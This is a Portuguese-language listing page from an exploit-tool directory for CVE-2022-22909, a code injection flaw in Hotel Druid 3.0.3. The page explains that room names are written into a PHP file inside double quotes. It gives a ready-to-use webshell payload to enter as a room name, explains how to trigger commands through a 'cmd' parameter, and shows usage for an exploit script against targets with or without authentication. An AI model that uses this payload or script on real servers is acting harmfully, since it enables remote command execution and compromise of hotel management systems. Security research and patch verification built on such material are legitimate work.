Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 Injeção de Código para Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/0z09e/cve-2022-22909
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 Injeção de Código para Execução Remota de Código

Ver Repositório
55há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-22909

Descrição

Uma vulnerabilidade de Injeção de Código foi encontrada na aplicação Hotel Druid v3.0.3, que um atacante poderia explorar para executar código remoto no servidor. Para uma exploração bem-sucedida, o atacante deve ter o privilégio de adicionar um novo quarto.

Descrição da vulnerabilidade

A vulnerabilidade ocorre porque os nomes dos quartos são armazenados dentro de um arquivo chamado /dati/selectappartamenti.php usando Aspas Duplas.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

Para realizar uma exploração bem-sucedida, adicione um quarto com o seguinte payload como nome do quarto.

root@kitploit:~
{${system($_REQUEST[cmd])}}

Após adicionar um novo quarto, vá para /dati/selectappartamenti.php e acione a webshell passando um comando usando o parâmetro cmd.

Uso

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            mostra esta mensagem de ajuda e sai

required arguments:
  -t TARGET, --target TARGET
                        URL alvo. Exemplo : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Nome de usuário
  -p PASSWORD, --password PASSWORD
                        Senha
  --noauth              Se nenhuma autenticação for necessária para acessar o painel

Exemplo

Se a aplicação não possui autenticação. Use a flag --noauth para realizar a exploração sem autenticação.

Se o servidor possui autenticação ativada, use --username e --password para realizar a autenticação.

Créditos

Pesquisador e escritor do POC - 0z09e


Baixar ferramenta